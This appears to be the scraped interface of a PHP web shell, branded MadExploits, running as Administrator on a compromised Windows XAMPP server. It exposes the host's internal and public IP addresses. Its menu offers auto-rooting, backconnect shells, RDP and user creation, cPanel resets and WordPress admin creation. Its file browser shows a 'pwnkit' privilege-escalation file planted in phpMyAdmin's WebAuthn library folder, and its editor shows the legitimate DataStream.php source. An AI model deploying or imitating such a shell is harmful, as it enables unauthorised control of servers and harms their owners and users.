Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 3.147.46.174
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
libraries /
classes /
WebAuthn /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
CBORDecoder.php
7.22
KB
-rw-rw-rw-
CustomServer.php
18.74
KB
-rw-rw-rw-
DataStream.php
1.3
KB
-rw-rw-rw-
Server.php
2.29
KB
-rw-rw-rw-
WebAuthnException.php
127
B
-rw-rw-rw-
WebauthnLibServer.php
11.34
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : DataStream.php
<?php declare(strict_types=1); namespace PhpMyAdmin\WebAuthn; use function fopen; use function fread; use function ftell; use function fwrite; use function rewind; final class DataStream { /** @var resource */ private $stream; /** * @throws WebAuthnException */ public function __construct(string $binaryString) { $resource = fopen('php://memory', 'rb+'); if ($resource === false || fwrite($resource, $binaryString) === false) { throw new WebAuthnException(); } if (! rewind($resource)) { throw new WebAuthnException(); } $this->stream = $resource; } /** * @throws WebAuthnException */ public function take(int $length): string { if ($length < 0) { throw new WebAuthnException(); } if ($length === 0) { return ''; } $string = fread($this->stream, $length); if ($string === false) { throw new WebAuthnException(); } return $string; } /** * @throws WebAuthnException */ public function getPosition(): int { $position = ftell($this->stream); if ($position === false) { throw new WebAuthnException(); } return $position; } }
Close